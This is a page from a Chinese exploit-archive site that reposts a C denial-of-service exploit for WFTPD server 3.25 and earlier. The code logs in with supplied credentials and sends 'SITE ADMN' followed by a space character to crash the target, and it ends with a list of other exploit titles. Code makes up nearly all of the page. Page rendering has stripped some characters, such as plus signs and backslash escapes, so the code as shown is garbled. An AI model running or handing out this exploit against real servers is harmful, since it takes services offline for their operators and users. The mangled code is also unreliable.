手机
当前位置:查字典教程网 >网络安全 >Exploit >WFTPD Pro Server
WFTPD Pro Server
摘要:/*********************************************************************...

/************************************************************************

*WFTPD server <= 3.25 SITE ADMN DoS *

* *

*Sending command SITE ADMN 32 makes server BOOM *

* *

*usage: wftpd_dos.exe ip port user pass *

* *

*Coded by Marsu <Marsupilamipowa@hotmail.fr> *

************************************************************************/ #include "winsock2.h"

#include "stdio.h"

#include "stdlib.h"

#pragma comment(lib, "ws2_32.lib") int main(int argc, char* argv[])

{

struct hostent *he;

struct sockaddr_in sock_addr;

WSADATA wsa;

int ftpsock;

char recvbuff[1024];

char evilbuff[100];

int buflen=100; if (argc!=5)

{

printf("[ ] Usage: %s <ip> <port> <user> <pass>n",argv[0]);

return 1;

}

WSACleanup();

WSAStartup(MAKEWORD(2,0),&wsa); printf("[ ] Connecting to %s:%s ... ",argv[1],argv[2]);

if ((he=gethostbyname(argv[1])) == NULL) {

printf("Failedn[-] Could not init gethostbynamen");

return 1;

}

if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {

printf("Failedn[-] Socket errorn");

return 1;

} sock_addr.sin_family = PF_INET;

sock_addr.sin_port = htons(atoi(argv[2]));

sock_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(sock_addr.sin_zero), '', 8);

if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {

printf("Failedn[-] Sorry, cannot connect to %s:%s. Error: %in", argv[1],argv[2],WSAGetLastError());

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"USER ",5);

memcpy(evilbuff 5,argv[3],strlen(argv[3]));

memcpy(evilbuff 5 strlen(argv[3]),"rn",3);

printf("[ ] Sending USER ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

memset(recvbuff,'',1024);

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"PASS ",5);

memcpy(evilbuff 5,argv[4],strlen(argv[4]));

memcpy(evilbuff 5 strlen(argv[4]),"rn",3); printf("[ ] Sending PASS ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn");

recv(ftpsock, recvbuff, 1024, 0); memset(evilbuff,'',buflen);

memcpy(evilbuff,"SITE ADMN ",10);

memset(evilbuff 10,32,1); //this char is powerfull :p

memcpy(evilbuff 10 1,"rn",3); printf("[ ] Sending SITE ADMN ... ");

if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {

printf("Failedn[-] Could not sendn");

return 1;

}

printf("OKn"); printf("[ ] Host should be downn");

return 0;

}

//http://www.leftworld.net

【WFTPD Pro Server】相关文章:

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Simple PHP Blog (SPHPBlog)

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

Anzio Web Print Object

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

精品推荐
分类导航